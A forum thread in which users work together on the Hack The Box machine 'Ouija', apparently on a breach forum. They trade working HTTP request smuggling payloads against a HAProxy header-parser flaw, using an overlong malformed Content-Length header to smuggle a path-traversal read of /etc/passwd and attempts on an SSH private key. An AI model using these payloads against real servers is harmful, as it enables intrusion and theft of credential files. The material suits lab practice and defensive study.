[peRd1]

I have lfi through Http Smugglin, currently trying to escalate privileges in the 3000 api

need an ihash and identifier variables for that...

[ajasjas]

I'm getting timeouts for the second/smuggled request... I verified in a local lab env and it should work.

[Azad23]

In gitea UI I created a new token and tried that with no luck, but maybe I did something wrong, someone else should check

Also tried that without any luck so far

Pretty sure that it's about the smuggling vulnerability and checking requests on the server status page 

https://www.mail-archive.com/haproxy@for...43229.html

Did you find any POC?
I was able to read https://portswigger.net/web-security/req...-smuggling
and then I found something related that pin points better the vuln https://www.haproxy.com/blog/february-20...rser-fixed
with an entry:
```
This vulnerability affects the header parser and permits header manipulations that might be unauthorized or dangerous.
Examples:

• a transfer-encoding header may be hidden after the presence of a content-length header is confirmed and sent to another proxy
  
• a transfer-encoding header or a content-length header may be hidden after the internal parser has confirmed its presence; in this scenario, the parser will consider the missing header to still be present.
  

```

so I am trying myseld with all 3 paths we know looking at the apache status
I only see my request when doing GET and not posts.. trying:
on gitea.ouija.htb
POST an d GET to  /user/events HTTP/1.1
on
ouija.htb
POST and GET to /

no luck so far, or i am following the directions/examples from here wrong: https://portswigger.net/web-security/req...ng/finding

as far i get i only found  CVE-2023-38408 .... https://github.com/LucasPDiniz/CVE-2023-38408 ... the release we are working on (OpenSSH 8.9p1 Ubuntu 3ubuntu0.4)in theory should vulnerable ... but i do not dig in it ... im still looking around

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.

[nenandjabhata]

Hey can anyone help, i am trying this :
POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 88


GET http://dev.ouija.htb/editor.php?file=../...etc/passwd HTTP/1.1
x:Get / HTTP/1.1
Host: ouija.htb

[Nelkil]

Hey can anyone help, i am trying this :
POST /index.html HTTP/1.1
Host: ouija.htb
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 88


GET http://dev.ouija.htb/editor.php?file=../...etc/passwd HTTP/1.1
x:Get / HTTP/1.1
Host: ouija.htb

I think (I might be wrong) that you have to change your content length to something like 74. But even if I got the html for editor.php, I can't read the content of any file. Any ideas?

[caccapuzza]

the content lenght need to be the size of the second request:

POST /index.html HTTP/1.1

Host: ouija.htb

Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:

Content-Length: 80





GET http://dev.ouija.htb/editor.php?file=../...etc/passwd HTTP/1.1

x:Get / HTTP/1.1

Host: ouija.htb

(this payload works)
if you want to search  ../../../../../etc/passwd, so u added 3 chars so the content lenght of this new request should be 83.
Check your burpsuite settings in repeater, the 'Update content-lenght' need to be off every time you restart burpsuite
EDIT:

for some reason the post rendering mess up url, the path to file in first request is ../../../../etc/passwd

---

POST /index.html HTTP/1.1

Host: ouija.htb

Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:

Content-Length: 42





GET http://ouija.htb/admin/ HTTP/1.1

x:Get / HTTP/1.1

Host: ouija.htb


Whit this i can also get /admin/ but there is nothing there.
The requests in order to work need to have 2 \n\r as separator (one between the two and one at the end)

[M4RCK]

GOT ssh key for leila

how did you reached ssh-key?

[blade33]

GOT ssh key for leila

could you share more details for us?

[hack404]

[quote="JacquesPhil12" pid='276693' dateline='1701620436']
GOT ssh key for leila
How to find it.Please share.

[caccapuzza]

GOT ssh key for leila

where, the request to ../../../../home/leila/.ssh/id_rsa
return empty; also from etc/passwd there is no leila user